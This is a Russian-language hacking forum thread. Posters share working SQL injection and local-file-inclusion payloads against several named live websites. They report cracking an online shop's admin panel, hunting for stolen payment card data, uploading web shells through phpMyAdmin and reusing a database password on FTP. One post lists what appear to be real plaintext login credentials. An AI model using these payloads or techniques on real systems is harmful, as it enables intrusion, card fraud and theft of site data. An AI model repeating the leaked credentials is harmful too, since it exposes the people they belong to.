Почему в Blind SQL Injection, когда ввожу запрос: xxxx.com/shooping_cart.php?prod_id=(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)-- выводится ошибка:Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 И еще вопрос почему запрос shoping_cart.php?prod_id=22+and+length(@@version)>1 проходит нормально, а prod_id=22+and+substring(@@version,1,1)=5 выдает ошибку Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 UPDATE: Разобрался. Надо было использовать конструкцию SUBSTRING(@@version FROM 1 FOR 1) UPDATE2: Ура! Есть пароль к админке!!! только вот картона в админке нет, хотя есть все продажи. На сайте есть форма вбива картона. Может ли быть что он не сохраняется? UPDATE3: Ура! В админке есть полноценная SQL инъекция (не блайнд)=)) UPDATE4: Есть доступ к файлам из MySQL (file_priv=Y) как отредактировать php файлы на сервере? UPDATE5: Откопал доступ к phpmyadmin. Осталось залить шелл. Как залить шелл через PHPmyAdmin?
Подскажите пожалуйста, как раскрутить LFI на сервере с FreeBSD? Цель - залить шелл. На никсах знаю, через environ, но на фрях это не катит (или я не там смотрел?)...есть ли какой-нибудь хороший и главное понятный ман по раскрутке LFI на различных ОСях? Заранее спасибо...
http://as-roma.ru/team.php?id=61+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1-- Вот поля. Видимо слепая она.
Нашел инструкцию залива шелла через phpmyadmin. Все сделал как надо. Все прошло без ошибок. Файл создался (т.к. при повторном запросе пишет что данный файл уже существует) но когда я ввожу в адресной строке site.com/shell.php то у меня открывается SiteMap. Причем этот же сайт мап открывается если ввести не существующий файл например site.com/dasdasd.php В чем проблема? UPDATE: ОХРЕНЕТЬ!!! Пароль от SQL подошел к FTP!!! Ща наведу там порядок
Можно: https://rdot.org/forum/showthread.php?t=60 Только метод этот не мой, попрошу мне чужие заслуги не приписывать
Приветствую, маны почитал, вроде даже понял, но раскрутить не могу... http://mzrd.ru/?f=%2fetc%2fpasswd%00 Пожалуйста, ткните носом...
Привет. Есть инъекция: http://www.swazicandlesusa.com/support/links.php?catID=22+and+1=0+union+select+1111,2222-- Пароли в plaintext-е: Dapo5716?:eM58478 jim@macpor:h9$@JL3 Админка в /admin/. Как залить шелл?
ЧУВАК а не думаешь что нужно много слyшать и мало говорить? там читалка,шелл залить не получится, только читать конфиги если что..
wso2.php%00.jpg или как-нить так... А еще лучше попробуй с этими же паролями к фтп законнектиться(если он там есть)